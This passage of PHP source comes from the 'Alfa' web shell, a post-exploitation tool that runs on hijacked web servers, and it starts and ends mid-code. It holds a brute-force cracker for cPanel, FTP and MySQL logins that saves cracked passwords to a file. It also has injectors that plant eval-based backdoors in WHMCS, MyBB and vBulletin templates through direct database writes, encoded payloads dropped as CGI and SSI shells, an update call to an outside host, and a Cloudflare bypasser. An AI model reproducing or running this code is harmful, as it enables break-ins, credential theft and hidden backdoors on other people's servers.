color=\'red\'>Error: $curl_error</font><br>";}\r\nelseif(preg_match(\'/filemanager/i\',$result)){\r\necho \'UserName: <font color="red">\'.$info[\'username\'].\'</font> PassWord: <font color="red">\'.$info[\'password\'].\'</font><font color="green">  Login Success....</font><br>\';\r\n$info[\'target\'] = $url;\r\nCrackerResualt($info);\r\n}\r\ncurl_close($curl);\r\n}\r\nfunction Alfa_FTP_Cracker($info){\r\n$url = $info[\'protocol\'].$info[\'target\'];\r\n$curl = curl_init();\r\ncurl_setopt($curl, CURLOPT_URL, $url);\r\ncurl_setopt($curl, CURLOPT_USERAGENT,\'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0\');\r\ncurl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);\r\ncurl_setopt($curl, CURLOPT_USERPWD, "".$info[\'username\'].":".$info[\'password\']."");\r\n$result = @curl_exec($curl);\r\n$curl_errno = curl_errno($curl);\r\n$curl_error = curl_error($curl);\r\nif ($curl_errno > 0) {echo "<font color=\'red\'>Error: $curl_error</font><br>";}\r\nelseif(preg_match(\'/(\\d+):(\\d+)/i\',$result)){\r\necho \'UserName: <font color="red">\'.$info[\'username\'].\'</font> PassWord: <font color="red">\'.$info[\'password\'].\'</font><font color="green">  Login Success....</font><br>\';\r\n$info[\'target\'] = $url;\r\nCrackerResualt($info);\r\n}\r\ncurl_close($curl);\r\n}\r\nfunction Alfa_Mysql_Cracker($info){\r\nif(@mysqli_connect($info[\'target\'].\':\'.$info[\'port\'],$info[\'username\'],$info[\'password\'])){\r\nCrackerResualt($info);\r\necho \'UserName: <font color="red">\'.$info[\'username\'].\'</font> PassWord: <font color="red">\'.$info[\'password\'].\'</font><font color="green">  Login Success....</font><br>\';\r\n}\r\n}\r\nfunction Alfa_FTPC($info){\r\nif($con=@ftp_connect($info[\'target\'],$info[\'port\'])){\r\nif($con){\r\n$login=@ftp_login($con,$info[\'username\'],$info[\'password\']);\r\nif($login){CrackerResualt($info);}}}\r\n@ftp_close($con);\r\n}\r\nfunction CrackerResualt($info){\r\n$res = $info[\'target\'].\' => \'.$info[\'username\'].":".$info[\'password\']."\\n" ;\r\n$c = @fopen($info[\'fcrack\'],\'a+\');\r\n@fwrite($c, $res);\r\n@fclose($c);\r\n}\r\nfunction Alfa_Call_Function_Cracker($method,$info){\r\nswitch($method){case \'cp\':return Alfa_CP_Cracker($info);break;case \'direct\': case \'phpmyadmin\':return Alfa_DirectAdmin_Cracker($info);break;case \'ftp\':return Alfa_FTP_Cracker($info);break;case \'mysql\':return Alfa_Mysql_Cracker($info);break;case \'mysql\':return Alfa_FTPC($info);break;}\r\n}\r\nfunction alfaCrackers(){\r\nalfahead();\r\nAlfaNum(9,10);\r\necho \'<div class="header"><center><br><div class="txtfont_header">| Brute Forcer |</div><br><br><form method="post" onsubmit="g(\\\'Crackers\\\',null,this.target.value,this.port.value,this.usernames.value,this.passwords.value,this.fcrack.value,\\\'start\\\',this.protocol.value,this.loginpanel.value);return false;"><div class="txtfont">Login Page: <select onclick="dis_input(this.value);" name="loginpanel">\';\r\nforeach(array(\'cp\'=>\'Cpanel\',\'direct\'=>\'DirectAdmin\',\'ftp\'=>\'FTP\',\'phpmyadmin\'=>\'PhpMyAdmin[DirectAdmin]\',\'mysql\'=>\'mysql_connect()\',\'ftpc\'=>\'ftp_connect()\') as $key=>$val)echo(\'<option value="\'.$key.\'">\'.$val.\'</option>\');\r\necho \'</select> Protocol: <select id="protocol" name="protocol">\';\r\nforeach(array(\'https://\',\'http://\',\'ftp://\') as $val)echo(\'<option value="\'.$val.\'">\'.$val.\'</option>\');\r\necho \'</select> Website/ip Address: <input id="target" type="text" name="target" value="localhost">\r\nPort: <input id="port" type="text" name="port" value="2083">\r\n<table width="30%"><td align="center">Users List</td><td align="center">Passwords</td></table>\r\n<textarea placeholder="Users" rows="20" cols="25" name="usernames">\'.($GLOBALS[\'sys\']==\'unix\'?alfaEx("cut -d: -f1 /etc/passwd"):"").\'</textarea>\r\n&nbsp <textarea placeholder="Passwords" rows="20" cols="25" name="passwords"></textarea><br><br>\r\nSave Result Into File <input type="text" name="fcrack" value="cracked.txt">\r\n<p><input type="submit" name="cracking" value=" " /></div></form></p><center>\';\r\n$target = str_replace(array(\'https://\',\'http://\',\'ftp://\'),\'\',$_POST[\'alfa1\']);\r\n$port = $_POST[\'alfa2\'];\r\n$usernames= $_POST[\'alfa3\'];\r\n$passwords = $_POST[\'alfa4\'];\r\n$fcrack = $_POST[\'alfa5\'];\r\n$cracking = $_POST[\'alfa6\'];\r\n$protocol = $_POST[\'alfa7\'];\r\n$loginpanel = $_POST[\'alfa8\'];\r\n$p = $loginpanel == \'phpmyadmin\' ? $p = true : false;\r\nif($cracking==\'start\'){\r\necho __pre();\r\n$exuser = explode("\\n",$usernames);\r\n$expw = explode("\\n",$passwords);\r\nforeach($exuser as $user){\r\nforeach($expw as $pw){\r\n$array = array(\'username\' => trim($user),\'password\' => trim($pw),\'port\' => trim($port),\'target\' => trim($target),\'protocol\' => trim($protocol),\'fcrack\' => trim($fcrack),\'mysql\' => $p);\r\nAlfa_Call_Function_Cracker($loginpanel,$array);\r\n}\r\n}\r\necho \'<br><font color="red">Attack Finished...</font>\';\r\n}\r\necho \'</div>\';\r\nalfafooter();\r\n}\r\nfunction output($string){ echo "<br><pre id=\\"strOutput\\" style=\\"margin-top:5px\\" class=\\"ml1\\"><br><center><font color=red><a target=\'_blank\' href=\'".$string."\'>Click Here !</a></font></b></center><br><br>";}\r\nfunction alfaShellInjectors(){\r\nalfahead();\r\necho \'<div class=header>\';\r\nAlfaNum(11);\r\necho \'<center><p><div class="txtfont_header">| Cms Shell Injector |</div></p><center><h3><a href=javascript:void(0) onclick="g(\\\'ShellInjectors\\\',null,\\\'whmcs\\\',null)">| WHMCS | </a><a href=javascript:void(0) onclick="g(\\\'ShellInjectors\\\',null,null,\\\'mybb\\\')">| MyBB | </a><a href=javascript:void(0) onclick="g(\\\'ShellInjectors\\\',null,null,null,\\\'vb\\\')">| vBulletin |</a></h3></center>\';\r\n$selector = \'<p><div class="txtfont">Shell Inject Method : </div> <select name="method" style="width:100px;"><option value="auto">AutoMatic</option><option value="man">Manuel</option></select></p>\';\r\nif(isset($_POST[\'alfa1\']) && $_POST[\'alfa1\']== \'whmcs\'){\r\nAlfaNum();\r\necho __pre()."<p><div class=\'txtfont_header\'>| WHMCS |</div></p><center><center><p>".getConfigHtml(\'whmcs\')."</p><form onSubmit=\\"g(\'ShellInjectors\',null,\'whmcs\',null,null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.path.value); return false;\\" method=\'post\'>";\r\n$table = array(\'td1\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Path WHMCS Url : \', \'inputName\' => \'path\', \'inputValue\' => \'http://site.com/whmcs\', \'inputSize\' => \'50\'),\r\n \'td2\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Mysql Host : \', \'inputName\' => \'dbh\', \'id\' => \'db_host\', \'inputValue\' => \'localhost\', \'inputSize\' => \'50\'),\r\n \'td3\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Name : \', \'inputName\' => \'dbn\', \'id\' => \'db_name\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td4\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db User : \', \'inputName\' => \'dbu\', \'id\' => \'db_user\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td5\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Pass : \', \'inputName\' => \'dbp\', \'id\' => \'db_pw\', \'inputValue\' => \'\', \'inputSize\' => \'50\')\r\n);\r\ncreate_table($table);\r\necho $selector;\r\necho "<p><input type=\'submit\' value=\' \'></p></form></center></td></tr></table></center>";\r\nif(isset($_POST[\'alfa6\'])) {\r\n$dbu = $_POST[\'alfa6\'];\r\n$dbn = $_POST[\'alfa7\'];\r\n$dbp = $_POST[\'alfa8\'];\r\n$dbh = $_POST[\'alfa9\'];\r\n$path = $_POST[\'alfa10\'];\r\n$method = $_POST[\'alfa4\'];\r\n$index = "{php}".ALFA_UPLOADER.";{/php}";\r\n$newin = str_replace("\'","\\\'",$index);\r\n$newindex = "<p>Dear $newin,</p><p>Recently a request was submitted to reset your password for our client area. If you did not request this, please ignore this email. It will expire and become useless in 2 hours time.</p><p>To reset your password, please visit the url below:<br /><a href=\\"{\\$pw_reset_url}\\">{\\$pw_reset_url}</a></p><p>When you visit the link above, your password will be reset, and the new password will be emailed to you.</p><p>{\\$signature}</p>{php}if(\\$_COOKIE[\\"sec\\"] == \\"123\\"){eval(base64_decode(\\$_COOKIE[\\"sec2\\"])); die(\\"!\\");}{\\/php}";\r\nif(!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)){\r\nif(filter_var($path,FILTER_VALIDATE_URL)){\r\n$conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_connect_error());\r\n$soleSave= mysqli_query($conn,"select message from tblemailtemplates where name=\'Password Reset Validation\'");\r\n$soleGet = mysqli_fetch_assoc($soleSave);\r\n$tempSave1 = $soleGet[\'message\'];\r\n$tempSave = str_replace("\'","\\\'",$tempSave1);\r\nmysqli_query($conn,"UPDATE tblconfiguration SET value = \'1\' WHERE setting = \'AllowSmartyPhpTags\'") or die (mysqli_error($conn));\r\n$inject = "UPDATE tblemailtemplates SET message=\'$newindex\' WHERE name=\'Password Reset Validation\'";\r\n$result = mysqli_query($conn,$inject) or die (mysqli_error($conn));\r\n$create = "insert into tblclients (email) values(\'solevisible@fbi.gov\')";\r\n$result2 = mysqli_query($conn,$create) or die (mysqli_error($conn));\r\nif(function_exists(\'curl_version\') && $method == \'auto\'){\r\n$AlfaSole = new AlfaCURL(true);\r\n$saveurl = $AlfaSole->Send($path."/pwreset.php");\r\n$getToken = preg_match("/name=\\"token\\" value=\\"(.*?)\\"/i",$saveurl,$token);\r\n$AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&email=solevisible@fbi.gov");\r\n$backdata = "UPDATE tblemailtemplates SET message=\'{$tempSave}\' WHERE name=\'Password Reset Validation\'";\r\n$Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));\r\n__alert("shell injectet...");\r\n$ff= \'http://\'.$path."/solevisible.php";\r\noutput($ff);}else{\r\necho "<br><pre id=\\"strOutput\\" style=\\"margin-top:5px\\" class=\\"ml1\\"><br><center><b><font color=\\"#FFFFFF\\">Please go to Target => </font><a href=\'".$path."/pwreset.php\' target=\'_blank\'>".$path."/pwreset.php</a><br/><font color=\'#FFFFFF\'> And Reset Password With Email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color=\'#FFFFFF\'>And Go To => </font><a href=\'".$path."/solevisible.php\' target=\'_blank\'>".$path."/solevisible.php</a></b></center><br><br>";}}else{__alert(\'Path is not Valid...\');}}}\r\n}if(isset($_POST[\'alfa2\']) && $_POST[\'alfa2\']== \'mybb\'){\r\nAlfaNum(1,2,3,5);\r\necho __pre()."<p><div class=\'txtfont_header\'>| MyBB |</div></p><center><center>".getConfigHtml("mybb")."<form id=\'sendajax\' onSubmit=\\"g(\'ShellInjectors\',null,null,\'mybb\',null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.prefix.value); return false;\\" method=POST>\r\n";\r\n$table = array(\'td1\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Host : \', \'inputName\' => \'dbh\', \'id\'=>\'db_host\',\'inputValue\' => \'localhost\', \'inputSize\' => \'50\'),\r\n \'td2\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'DataBase Name : \', \'inputName\' => \'dbn\', \'id\'=>\'db_name\' ,\'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td3\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'User Name : \', \'inputName\' => \'dbu\', \'id\'=>\'db_user\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td4\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Password : \', \'inputName\' => \'dbp\', \'id\'=>\'db_pw\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td5\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Table Prefix : \', \'inputName\' => \'prefix\', \'id\'=>\'db_prefix\',\'inputValue\' => \'mybb_\', \'inputSize\' => \'50\')\r\n);\r\ncreate_table($table);\r\necho $selector;\r\necho "<p><input type=submit value=\' \'></p></form></center></center>";\r\nif(isset($_POST[\'alfa6\'])) {\r\n$dbu = $_POST[\'alfa6\'];\r\n$dbn = $_POST[\'alfa7\'];\r\n$dbp = $_POST[\'alfa8\'];\r\n$dbh = $_POST[\'alfa9\'];\r\n$prefix = $_POST[\'alfa10\'];\r\n$method = $_POST[\'alfa4\'];\r\n$shellCode = "{\\${".ALFA_UPLOADER."}}";\r\n$newinshell = str_replace("\'","\\\'",$shellCode);\r\nif (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($newinshell)){\r\n$conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));\r\n$inject = "select template from {$prefix}templates where  title= \'calendar\'";\r\n$result = mysqli_query($conn, $inject) or die (mysqli_error($conn));\r\n$GetTemp = mysqli_fetch_assoc($result);\r\n$saveDate = $GetTemp[\'template\'];\r\n$repsave = str_replace($shellCode,"",$saveDate);\r\n$repsave = str_replace("\'","\\\'",$repsave);\r\n$createShell = "update {$prefix}templates SET template= \'".$newinshell.$repsave."\' where title = \'calendar\'";\r\n$result2 = mysqli_query($conn,$createShell) or die (mysqli_error($conn));\r\n$geturl = "select value from {$prefix}settings where name= \'bburl\'";\r\n$findurl = mysqli_query($conn,$geturl) or die (mysqli_error($conn));\r\n$rowb = mysqli_fetch_assoc($findurl);\r\n$furl = $rowb[\'value\'];\r\n$realurl = parse_url($furl,PHP_URL_HOST);\r\n$realpath = parse_url($furl,PHP_URL_PATH);\r\n$res = false;\r\n$AlfaCurl = new AlfaCURL();\r\nif (extension_loaded(\'sockets\') && function_exists(\'fsockopen\') && $method == \'auto\' ){\r\nif ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){\r\n@fputs($fsock, "GET $realpath/calendar.php HTTP/1.1\\r\\n");\r\n@fputs($fsock, "HOST: $realurl\\r\\n");\r\n@fputs($fsock, "Connection: close\\r\\n\\r\\n");\r\n$check = fgets($fsock);\r\nif(preg_match("/200 OK/i",$check)){\r\n$repairdbtemp = "update {$prefix}templates SET template= \'$repsave\' where title = \'calendar\'";\r\n$clear = mysqli_query($conn,$repairdbtemp) or die (mysqli_error($conn));$res = true;}\r\n@fclose($fsock);}}elseif(function_exists(\'curl_version\') && $method == \'auto\'){\r\n$AlfaCurl->Send($realurl.$realpath."/calendar.php");\r\n$res = true;\r\n}\r\nif($res){\r\n$ff = \'http://\'.$realurl.$realpath."/solevisible.php";\r\noutput($ff);\r\n}else{\r\n$ff = \'http://\'.$realurl.$realpath."/calendar.php";\r\n$fff = \'http://\'.$realurl.$realpath."/solevisible.php";\r\necho "<br><pre id=\'strOutput\' style=\'margin-top:5px\' class=\'ml1\'><br><center><b><font color=\'#FFFFFF\'>Please Go To Target => </font><a href=\'".$ff."\' target=\'_blank\'>".$ff."</a><br/><font color=\'#FFFFFF\'>And Go To => </font><a href=\'".$fff."\' target=\'_blank\'>".$fff."</a></b></center><br><br>";\r\n}}}}\r\nif(isset($_POST[\'alfa3\']) && $_POST[\'alfa3\']== \'vb\'){\r\nAlfaNum(1,2,7,9,10);\r\necho __pre().\'<p><div class="txtfont_header">| vbulletin |</div></p><p>\'.getConfigHtml(\'vb\').\'</p><form name="frm" method="POST" onsubmit="g(\\\'ShellInjectors\\\',null,null,this.lo.value,\\\'vb\\\',this.user.value,this.pass.value,this.tab.value,this.db.value,this.method.value); return false;">\';\r\n$table = array(\'td1\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Host : \', \'inputName\' => \'lo\', \'id\'=>\'db_host\',\'inputValue\' => \'localhost\', \'inputSize\' => \'50\'),\r\n \'td2\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'DataBase Name : \', \'inputName\' => \'db\', \'id\'=>\'db_name\',\'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td3\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'User Name : \', \'inputName\' => \'user\', \'id\'=>\'db_user\',\'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td4\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Password : \', \'inputName\' => \'pass\', \'id\'=>\'db_pw\',\'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td5\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Table Prefix : \', \'inputName\' => \'tab\', \'id\'=>\'db_prefix\',\'inputValue\' => \'\', \'inputSize\' => \'50\')\r\n);\r\ncreate_table($table);\r\necho $selector;\r\necho \'<p><input type="submit" value=" " /></p></form></center>\';\r\nif(isset($_POST[\'alfa4\'])&&!empty($_POST[\'alfa4\'])){\r\n$method = $_POST[\'alfa8\'];\r\n$faq_name = "faq";\r\n$faq_file = "/faq.php";\r\n$code = "{\\${".ALFA_UPLOADER."}}{\\${exit()}}&";\r\n$conn=@mysqli_connect($_POST[\'alfa2\'],$_POST[\'alfa4\'],$_POST[\'alfa5\'],$_POST[\'alfa7\']) or die(@mysqli_connect_error());\r\n$rec = "select `template` from ".$_POST[\'alfa6\']."template WHERE title =\'".$faq_name."\'";\r\n$recivedata = @mysqli_query($conn,$rec);\r\n$getd = @mysqli_fetch_assoc($recivedata);\r\n$savetoass = $getd[\'template\'];\r\nif(empty($savetoass)){\r\n\t$faq_name = "header";\r\n\t$faq_file = "/";\r\n\t$rec = "select `template` from ".$_POST[\'alfa6\']."template WHERE title =\'".$faq_name."\'";\r\n\t$recivedata = @mysqli_query($conn,$rec);\r\n\t$getd = @mysqli_fetch_assoc($recivedata);\r\n\t$savetoass = $getd[\'template\'];\r\n\t$code = ALFA_UPLOADER.";";\r\n}\r\n$code = str_replace("\'","\\\'",$code);\r\n$p = "UPDATE ".$_POST[\'alfa6\']."template SET `template`=\'".$code."\' WHERE `title`=\'".$faq_name."\'";\r\n$ka= @mysqli_query($conn,$p) or die(mysqli_error($conn));\r\n$geturl = @mysqli_query($conn,"select `value` from ".$_POST[\'alfa6\']."setting WHERE `varname`=\'bburl\'");\r\n$getval = @mysqli_fetch_assoc($geturl);\r\n$saveval = $getval[\'value\'];\r\nif($faq_name == "header"){\r\n\tif(substr($saveval, -5, 5) == "/core"){\r\n\t\t$saveval = substr($saveval, 0, -5);\r\n\t}\r\n}\r\n$realurl = parse_url($saveval,PHP_URL_HOST);\r\n$realpath = parse_url($saveval,PHP_URL_PATH);\r\n$res = false;\r\n$AlfaCurl = new AlfaCURL();\r\nif(extension_loaded(\'sockets\') && function_exists(\'fsockopen\') && $method == \'auto\'){\r\nif($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){\r\n@fputs($fsock, "GET $realpath.$faq_file HTTP/1.1\\r\\n");\r\n@fputs($fsock, "HOST: $realurl\\r\\n");\r\n@fputs($fsock, "Connection: close\\r\\n\\r\\n");\r\n$check = fgets($fsock);\r\nif(preg_match("/200 OK/i",$check)){\r\n$p1 = "UPDATE ".$_POST[\'alfa6\']."template SET template =\'".mysqli_real_escape_string($conn,$savetoass)."\' WHERE title =\'".$faq_name."\'";\r\n$ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));\r\n$res = true;\r\n}\r\n@fclose($fsock);\r\n}\r\n}elseif(function_exists(\'curl_version\') && $method == \'auto\'){\r\n$AlfaCurl->Send($realurl.$realpath.$faq_file);\r\n$p1 = "UPDATE ".$_POST[\'alfa6\']."template SET template =\'".mysqli_real_escape_string($conn,$savetoass)."\' WHERE title =\'".$faq_name."\'";\r\n$ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));\r\n$res = true;\r\n}\r\nif($res){\r\n$ff = \'http://\'.$realurl.$realpath."/solevisible.php";\r\noutput($ff);\r\n}else{\r\n$ff = \'http://\'.$realurl.$realpath.$faq_file;\r\n$fff = \'http://\'.$realurl.$realpath."/solevisible.php";\r\necho "<center><p><font color=\\"#FFFFFF\\">First Open This Link => </font><a href=\'".$ff."\' target=\'_blank\'>".$ff."</a><br/><font color=\\"#FFFFFF\\">Second Open This Link => </font><a href=\'".$fff."\' target=\'_blank\'>".$fff."</a></center></p>";}}}\r\necho \'</div>\';\r\nalfafooter();\r\n}\r\nfunction alfacheckfiletype(){\r\n\t$path = $_POST[\'path\'];\r\n\t$arg = $_POST[\'arg\'];\r\n\tif(@is_file($path.\'/\'.$arg)){\r\n\t\techo("file");\r\n\t}else{\r\n\t\techo("dir");\r\n\t}\r\n}\r\nfunction alfacheckupdate(){\r\n\tif($GLOBALS["DB_NAME"]["cgi_api"]){\r\n\t\tif(!isset($_COOKIE["alfacgiapi_mode"])&&!isset($_COOKIE["alfacgiapi"])){\r\n\t\t\t_alfa_cgicmd("whoami","perl",true);\r\n\t\t\tif(strlen(alfaEx("whoami",false,true))>0){\r\n\t\t\t\t__alfa_set_cookie("alfa_canruncmd", "true");\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tif(function_exists("curl_version")){\r\n\t\t$update = new AlfaCURL();\r\n\t\t$json = $update->Send("http://solevisible.com/update.json?ver=".__ALFA_VERSION__);\r\n\t\t$json = @json_decode($json,true);\r\n\t\t$data = array();\r\n\t\tif($json){\r\n\t\t\tif(!isset($_COOKIE[\'alfa_checkupdate\']) && !empty($json["type"])){\r\n\t\t\t\tif($json["type"] == "update"){\r\n\t\t\t\t\tif(__ALFA_VERSION__ != $json[\'version\'] || __ALFA_UPDATE__ != $json[\'version_number\']){\r\n\t\t\t\t\t\t@setcookie("alfa_checkupdate", "1", time()+86400);\r\n\t\t\t\t\t\t$data["content"] = \'<div class="update-holder">\'.$json["content"].\'</div>\';\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\tif(isset($json["ads"]) && !empty($json["ads"])){\r\n\t\t\t\t$data["content"] .= $json["ads"];\r\n\t\t\t}\r\n\t\t\tif(isset($json["copyright"]) && !empty($json["copyright"])){\r\n\t\t\t\t$data["copyright"] = $json["copyright"];\r\n\t\t\t}\r\n\t\t\tif(isset($json["solevisible"]) && !empty($json["solevisible"])){\r\n\t\t\t\t$data["solevisible"] = $json["solevisible"];\r\n\t\t\t}\r\n\t\t\tif(isset($json["code_name"]) && !empty($json["code_name"])){\r\n\t\t\t\t$data["code_name"] = $json["code_name"];\r\n\t\t\t\t$data["version_number"] = __ALFA_VERSION__;\r\n\t\t\t}\r\n\t\t\tif(isset($json["market"]) && !empty($json["market"])){\r\n\t\t\t\t$data["market"] = $json["market"];\r\n\t\t\t}\r\n\t\t\techo @json_encode($data);\r\n\t\t}\r\n\t}\r\n}\r\nfunction alfaWriteTocgiapi($name, $source){\r\n\t$temp = "";\r\n\t$not_api = array("basedir.alfa", "getdir.alfa", "getheader.alfa");\r\n\tif(in_array($name, $not_api)){\r\n\t\t$temp = ALFA_TEMPDIR;\r\n\t\tif($temp){\r\n\t\t\t@chdir($temp);\r\n\t\t}\r\n\t}else{\r\n\t\talfaCreateParentFolder();\r\n\t\t@chdir($GLOBALS[\'home_cwd\'] . "/" . __ALFA_DATA_FOLDER__);\r\n\t}\r\n\t@mkdir(\'alfacgiapi\',0755);\r\n\t__write_file("alfacgiapi/".$name, __get_resource($source));\r\n\t@chmod("alfacgiapi/".$name, 0755);\r\n\treturn $temp;\r\n}\r\nfunction alfacheckcgi(){if(strlen(alfaEx("id",false,true,true))>0)echo("ok");else echo("no");}\r\nfunction alfaupdateheader(){\r\n\tif(!isset($_COOKIE["updateheader_data"])){\r\n\t\t$bash = "zZRdb9owFIavya849dIGJLK0vVyFNFTohERBgtFdQIRM4hAL40R2UkYp/312gPARqLqbaYnyIfs8x+85r+UvV04qhTOh3JGhMeg3nwbtWnnqecDUoz8+zPGMQBzGEBPBIF4mYcRBpJMlJFjA9I3GMNm+MAvwPXCFRR5OCMiU+pqqGI3ur067W280e/1aeTElCQQk8UJgS/4bGOUzCV6q0usZtojtORUiEhWDeGEENgFrhVJJgpShb8ORZxlBJIAC5WCuNqqH3931A/iRAepahNQLa2Y5+4JJK0ZpOIQrsN8AmdkgAteFmxvY5R8hk45Q1VK5q4YfcZKvjEbqdqsjD+3FID9acBZhn4iinoNS/62olOM5UXqQZZazf7AxvKu+JmB7d/bd/W3FyiDrEJJEUH9LyQTrWEDXKQzhegAuUtpu0RluKqI0PgNONfjjA9CP5phyqUE98dLq/RzU2+NG97ne6vRryFH7wnmlIkkxczbBqtlESGR06s/Nxvix23nahuki/a9exANkvNTbrXq/mWfAjGJJpKNneuMMVVOvWGwoNU4DUAbobponKrQRD5CEhBulbZT4OKq0K9As48UMrGansYoF5Ql0emsLTtEK7PqgLYQSYftljhpwYQ0mC3HvsPDAZseZjxKb+/79jfQ9VcgtyQGOHrFiegT7aguc2ANuRgTUyAWRgiC99XNDtm4Wx7deXrLogLvQt4OYsz07duP8isWUedB/7sOnXbgs9KT2w6CzxW/0fX6baH35ceGu1SnxBw==";\r\n\t\t$realdir = addslashes(dirname($_SERVER["SCRIPT_FILENAME"]));\r\n\t\t$tmp_path = alfaWriteTocgiapi("getheader.alfa",$bash);\r\n\t\t$data = alfaEx("cd \'{$tmp_path}/alfacgiapi\';sh getheader.alfa",false,true,true);\r\n\t\tif(@is_array(@json_decode($data,true))){\r\n\t\t\t__alfa_set_cookie("updateheader_data", __ZW5jb2Rlcg($data));\r\n\t\t\techo $data;\r\n\t\t}\r\n\t}else{\r\n\t\techo __ZGVjb2Rlcg($_COOKIE["updateheader_data"]);\r\n\t}\r\n}\r\nfunction alfassiShell(){\r\nalfahead();\r\necho \'<div class=header>\';\r\nalfaCreateParentFolder();\r\n@chdir($GLOBALS[\'home_cwd\'] . "/" . __ALFA_DATA_FOLDER__);\r\n@mkdir(\'alfa_shtml\',0755);\r\n@chdir(\'alfa_shtml\');\r\nalfacgihtaccess(\'shtml\');\r\n$code = \'rVb9b9s2EP1Xrky22MhsKcu6ptbH0A+vzYbCXeztl6YoZImS2VCkQFJOvCX/+46SrChOnKRBA8ORyOPju3ePR/vPBoOdWIqUZUCVynUWkE9jpaT6TAaD0O9Ma/YvTXMTkPnKUN3OshToRaEC0jslu+9ns49f3kwmfx6PTwkEcEpOSR8uL8FOnoz/+ns8nX35MJ69n7zF+Wc24N14hjEE1niaGlhGiKcXnOATL2lAuIYBj66DKNf03hVdJterRIJs8Q2+C/OPk+kW6kzELXVnOLzjQ03sFJHW58lDSXWwNpOCzawWJuehv6BREvqGGU7DVzyNYEajHKbTY5guKOe+U0/5OlasMMAjkZVRhlS/RsuoHiRhWorYMCkgkcz0IJcJhT78x9IejsRlToUZxlKeMWrFIMROIl+oxzQquBE21AW3SMTDWC+VqmfzA4aRrof//PXSIaciMwsP9vcZ9Dc3C9Zhn3DNZ9hHPCwiU1QHs0X5E7gH8Eck4ODlCxdcd1R94N2HGfGubkO1Ixk1Y07t4+vVcbJOd1jJ7rVRXMaR1WSoKJdR0ut7V61MRmYZpz1giVViO7KdH2qz4nSYMJQkWiGP3jeFo9xCCor2/A3IHEmdERg1Y96V79QlDH2nNsJcJiuQwjIOyLaN9mKZ55FI9vrDFEM05kZgnsWSS/Tgjlv9EYg4E2fYAVAWNGXnBbdRoZ+wZejHiEnxZXEY+qkUBtYgz1/G8eEhCS/hDlfCpe/YaEsbFzprFAvbPod+2WDaZhSQ/QOCmcWcxcijqcAeFcs9y75SLSBxqbRUo0IyC+JVZEaKJh4Jx2LJlLQaABOpbAngJs68wwHTwkIEBJFb2KYaI6t6A7rz64tXr9/+7jViFIrWR7lQdmuxtEfbqUbttFOJVX/f0u5xmWK/e2Smb+rqAh470HUT2JJrTchmjLXOBKJWEwTOWWIWATlw3R/QGVIlFGuKlrDCVI23YTGP4rNMyVIkg0aW2jzezZ57/31QNcUbEt9sdY3E8w2H1QWwhUXK0Fi6TXUejn4Uc1143W8EUDnk1CwkJoKnwuqsy3nOjD0t2LGuj4atLBNFacCsCkzV0AsMrwt01EjRBJOwge/G17DtzXBSCgR0LIFbPt8o/WaCJ1SX3HQyu3lgLLFI0ahzgukv1E2OKiSNVfwZQZU8t4/PSXP9XNAY4jwJdrGc1T3krHHwaql8AX5r129zKl5ij3TqpKCqarIaUSBlnOoHz2V1RT7Srt/JpfXdX9m0Rny6Wf9h9LxKFHrYjkwZcexGMS8T2h91KvyQdQup7/Du0gLf69wjt9KwCnySa7flNUX0BxLYtrTSL7X0oJEk2EVNrJj1yuonaNf+T3Z9I/WtfTrmv9WuHXul2ovK/tz6Hw==\';\r\n@__write_file(\'alfa_ssi.shtml\',__get_resource($code));\r\n@chmod("alfa_ssi.shtml",0755);\r\necho AlfaiFrameCreator(\'alfa_shtml/alfa_ssi.shtml\');\r\necho \'</div>\';\r\nalfafooter();\r\n}\r\nfunction alfacloudflare(){\r\nalfahead();\r\nAlfaNum(8,9,10,7,6,5,4,3);\r\necho "<div class=header><center><br><div class=\'txtfont_header\'>| Cloud Flare ByPasser |</div><br><form action=\'\' onsubmit=\\"g(\'cloudflare\',null,this.url.value,\'>>\'); return false;\\" method=\'post\'>\r\n<p><div class=\'txtfont\'>Target:</div> <input type=\'text\' size=30 name=\'url\' style=\'text-align:center;\' placeholder=\\"target.com\\"> <input 